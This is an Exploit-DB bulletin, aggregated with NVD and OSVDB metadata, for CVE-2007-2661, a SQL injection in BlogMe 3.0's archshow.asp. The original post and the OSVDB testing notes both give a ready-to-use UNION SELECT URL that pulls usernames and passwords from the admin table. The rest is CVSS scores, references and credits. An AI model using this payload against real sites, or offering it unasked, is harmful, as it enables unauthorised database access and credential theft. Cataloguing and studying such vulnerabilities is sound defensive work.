ID EDB-ID:3914
Type exploitdb
Reporter gsy
Modified 2007-05-13T00:00:00
Description
BlogMe 3.0 (archshow.asp var) Remote SQL Injection Vulnerability. CVE-2007-2661. Webapps exploit for asp platform
Discoveredby:gsy&kerem125
Website:www.kerem125.com
ScriptDownload:http://www.drumster.net/gamma/products.asp (must buy)
exploit:/blogme/archshow.asp?var=-99%20Union+all+select+0,1,2,3,4,username,password,7,8,9,10,0+from+admin
contact:by_gsy@hotmail.com&kerem125@kerem125.com
Specialthxto:by_emr3,ercu_145,bolivar,voltigore,f10
# milw0rm.com [2007-05-13]
{"id": "EDB-ID:3914", "hash": "3f505de04d49fc490ffbb1b8f5b8aa19", "type": "exploitdb", "bulletinFamily": "exploit", "title": "BlogMe 3.0 archshow.asp var Remote SQL Injection Vulnerability", "description": "BlogMe 3.0 (archshow.asp var) Remote SQL Injection Vulnerability. CVE-2007-2661. Webapps exploit for asp platform", "published": "2007-05-13T00:00:00", "modified": "2007-05-13T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/3914/", "reporter": "gsy", "references": [], "cvelist": ["CVE-2007-2661"], "lastseen": "2016-01-31T19:35:59", "history": [], "viewCount": 4, "enchantments": {"score": {"value": 7.8, "vector": "NONE", "modified": "2016-01-31T19:35:59"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-2661"]}, {"type": "osvdb", "idList": ["OSVDB:36008"]}], "modified": "2016-01-31T19:35:59"}, "vulnersScore": 7.8}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/3914/", "sourceData": "Discoveredby:gsy&kerem125\n\nWebsite:www.kerem125.com\n\nScriptDownload:http://www.drumster.net/gamma/products.asp (must buy)\n\n\nexploit:/blogme/archshow.asp?var=-99%20Union+all+select+0,1,2,3,4,username,password,7,8,9,10,0+from+admin\n\n\ncontact:by_gsy@hotmail.com&kerem125@kerem125.com\nSpecialthxto:by_emr3,ercu_145,bolivar,voltigore,f10\n\n# milw0rm.com [2007-05-13]\n", "osvdbidlist": ["36008"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:08:59", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in archshow.asp in BlogMe 3.0 allows remote attackers to execute arbitrary SQL commands via the var parameter, a different vector than CVE-2006-5976.", "modified": "2017-10-11T01:32:00", "id": "CVE-2007-2661", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-2661", "published": "2007-05-14T23:19:00", "title": "CVE-2007-2661", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:32", "bulletinFamily": "software", "description": "## Manual Testing Notes\n/blogme/archshow.asp?var=-99%20Union+all+select+0,1,2,3,4,username,password,7,8,9,10,0+from+admin\n## References:\n[Secunia Advisory ID:25229](https://secuniaresearch.flexerasoftware.com/advisories/25229/)\nISS X-Force ID: 34253\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3914\nFrSIRT Advisory: ADV-2007-1784\n[CVE-2007-2661](https://vulners.com/cve/CVE-2007-2661)\nBugtraq ID: 23956\n", "modified": "2007-05-13T04:34:00", "published": "2007-05-13T04:34:00", "href": "https://vulners.com/osvdb/OSVDB:36008", "id": "OSVDB:36008", "title": "BlogMe archshow.asp var Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
